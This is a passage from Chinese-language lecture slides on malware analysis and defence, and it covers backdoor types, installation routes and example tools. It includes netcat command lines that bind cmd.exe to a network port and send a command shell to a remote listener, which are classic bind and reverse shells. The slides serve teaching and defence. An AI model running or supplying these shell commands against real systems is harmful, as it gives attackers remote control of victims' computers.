恶意软件（病毒）的分析与防范 Defence amp; analysis of malware.pptVIP

恶意软件（病毒）的分析与防范 Defence analysis of malware 计算机学院 傅建明 Fujms@ 后门 后门是一个允许攻击者绕过系统中常规安全控制机制的程序，他按照攻击者自己的意图提供通道。 后门的重点在于为攻击者提供进入目标计算机的通道。 后门的类型 本地权限的提升 对系统有访问权的攻击者变换其权限等级成为管理员，然后攻击者可以重新设置该系统或访问人和存储在系统中的文件。 单个命令的远程执行 攻击者可以向目标计算机发送消息。每次执行一个单独的命令，后门执行攻击者的命令并将输出返回给攻击者。 远程命令行解释器访问 正如远程Shell，这类后门允许攻击者通过网络快速直接地键入受害计算机的命令提示。其比“单个命令的远程执行”要强大得多。 远程控制GUI 攻击者可以看到目标计算机的GUI，控制鼠标的移动，输入对键盘的操作，这些都通过网络实现。 后门的安装 自己植入（物理接触或入侵之后） 通过病毒、蠕虫和恶意移动代码 欺骗受害者自己安装 Email 远程共享 BT下载 …… 后门举例 NetCat：通用的网络连接工具 用法一： nc –l –p 5000 –e cmd.exe nc 5000 用法二： nc –l –p 5000 nc 5000 –e cmd.exe cshell.exe 其他Windows下的后门程序 CryptCat T